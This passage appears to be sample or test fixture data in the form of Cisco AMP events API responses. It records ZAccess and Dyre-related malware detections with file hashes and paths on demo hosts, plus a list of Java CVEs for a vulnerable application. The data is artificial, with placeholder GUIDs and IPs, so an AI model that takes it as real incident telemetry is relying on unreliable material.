Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182415","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":717000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182414","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182412","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":606000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182410","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":583000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182409","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182408","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":16000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182406","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900400000800,"timestamp":1610705109,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:05:09+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ZAccess.15nt","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705109,"start_date":"2021-01-15T10:05:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"disposition":"Clean","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255854610743000,"timestamp":1610705106,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:05:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255854610743321","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899799000300,"timestamp":1610705105,"timestamp_nanoseconds":799000000,"date":"2021-01-15T10:05:05+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705105,"start_date":"2021-01-15T10:05:05+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}},"vulnerabilities":[{"name":"Oracle Java(TM) Platform SE","version":"1.7.0:update_10","cve":"CVE-2013-5830","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5830"},{"cve":"CVE-2013-5843","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5843"},{"cve":"CVE-2013-5842","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5842"},{"cve":"CVE-2013-5817","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5817"},{"cve":"CVE-2013-5814","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5814"},{"cve":"CVE-2013-5809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5809"},{"cve":"CVE-2013-5789","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5789"},{"cve":"CVE-2013-5829","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5829"},{"cve":"CVE-2013-5788","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5788"},{"cve":"CVE-2013-5824","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5824"},{"cve":"CVE-2013-5787","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5787"},{"cve":"CVE-2013-5782","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5782"},{"cve":"CVE-2013-2470","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2470"},{"cve":"CVE-2013-2465","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2465"},{"cve":"CVE-2013-2471","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2471"},{"cve":"CVE-2013-2473","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2473"},{"cve":"CVE-2013-2472","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2472"},{"cve":"CVE-2013-2469","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2469"},{"cve":"CVE-2013-2468","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2468"},{"cve":"CVE-2013-2466","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2466"},{"cve":"CVE-2013-2464","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2464"},{"cve":"CVE-2013-2463","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2463"},{"cve":"CVE-2013-2459","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2459"},{"cve":"CVE-2013-2428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2428"},{"cve":"CVE-2013-2420","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2420"},{"cve":"CVE-2013-2434","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2434"},{"cve":"CVE-2013-2384","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2384"},{"cve":"CVE-2013-1518","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1518"},{"cve":"CVE-2013-1537","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1537"},{"cve":"CVE-2013-2440","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2440"},{"cve":"CVE-2013-1557","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1557"},{"cve":"CVE-2013-1558","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1558"},{"cve":"CVE-2013-2435","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2435"},{"cve":"CVE-2013-2432","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2432"},{"cve":"CVE-2013-1569","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1569"},{"cve":"CVE-2013-2431","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2431"},{"cve":"CVE-2013-2383","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2383"},{"cve":"CVE-2013-2427","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2427"},{"cve":"CVE-2013-2425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2425"},{"cve":"CVE-2013-2422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2422"},{"cve":"CVE-2013-2414","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2414"},{"cve":"CVE-2013-0809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0809"},{"cve":"CVE-2013-1493","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493"},{"cve":"CVE-2013-1480","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1480"},{"cve":"CVE-2013-0428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0428"},{"cve":"CVE-2013-0437","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0437"},{"cve":"CVE-2013-0441","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0441"},{"cve":"CVE-2013-0442","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0442"},{"cve":"CVE-2013-0445","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0445"},{"cve":"CVE-2013-0450","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0450"},{"cve":"CVE-2013-1476","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1476"},{"cve":"CVE-2013-1478","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1478"},{"cve":"CVE-2013-1479","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1479"},{"cve":"CVE-2013-1484","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1484"},{"cve":"CVE-2013-0426","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0426"},{"cve":"CVE-2013-1486","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1486"},{"cve":"CVE-2013-1487","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1487"},{"cve":"CVE-2013-0425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0425"},{"cve":"CVE-2013-0422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422"},{"cve":"CVE-2013-0446","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0446"},{"cve":"CVE-2013-1475","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1475"},{"cve":"CVE-2013-2460","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2460"},{"cve":"CVE-2013-5838","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5838"},{"cve":"CVE-2013-5777","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5777"},{"cve":"CVE-2013-5810","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5810"},{"cve":"CVE-2013-5832","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5832"},{"cve":"CVE-2013-5806","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5806"},{"cve":"CVE-2013-5805","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5805"},{"cve":"CVE-2013-5850","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5850"},{"cve":"CVE-2013-5844","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5844"},{"cve":"CVE-2013-5846","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5846"},{"cve":"CVE-2013-2462","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2462"},{"cve":"CVE-2013-2436","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2436"},{"cve":"CVE-2013-2426","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2426"},{"cve":"CVE-2013-2421","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2421"},{"cve":"CVE-2013-2445","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2445"},{"cve":"CVE-2013-5852","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5852"},{"cve":"CVE-2013-2448","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2448"},{"cve":"CVE-2013-2394","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2394"},{"cve":"CVE-2013-2429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2429"},{"cve":"CVE-2013-2430","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2430"},{"cve":"CVE-2013-1563","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1563"},{"cve":"CVE-2013-0429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0429"},{"cve":"CVE-2013-0444","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0444"},{"cve":"CVE-2013-0419","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0419"},{"cve":"CVE-2013-0423","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0423"},{"cve":"CVE-2013-5775","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5775"},{"cve":"CVE-2013-5802","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5802"},{"cve":"CVE-2013-2442","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2442"},{"cve":"CVE-2013-2461","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2461"},{"cve":"CVE-2013-0351","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0351"},{"cve":"CVE-2013-2439","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2439"},{"cve":"CVE-2013-0430","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0430"},{"cve":"CVE-2013-3829","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3829"},{"cve":"CVE-2013-5783","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5783"},{"cve":"CVE-2013-5804","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5804"},{"cve":"CVE-2013-5812","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5812"},{"cve":"CVE-2013-2407","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2407"},{"cve":"CVE-2013-0432","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0432"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255807366103000,"timestamp":1610705095,"timestamp_nanoseconds":45000000,"date":"2021-01-15T10:04:55+00:00","event_type":"Threat 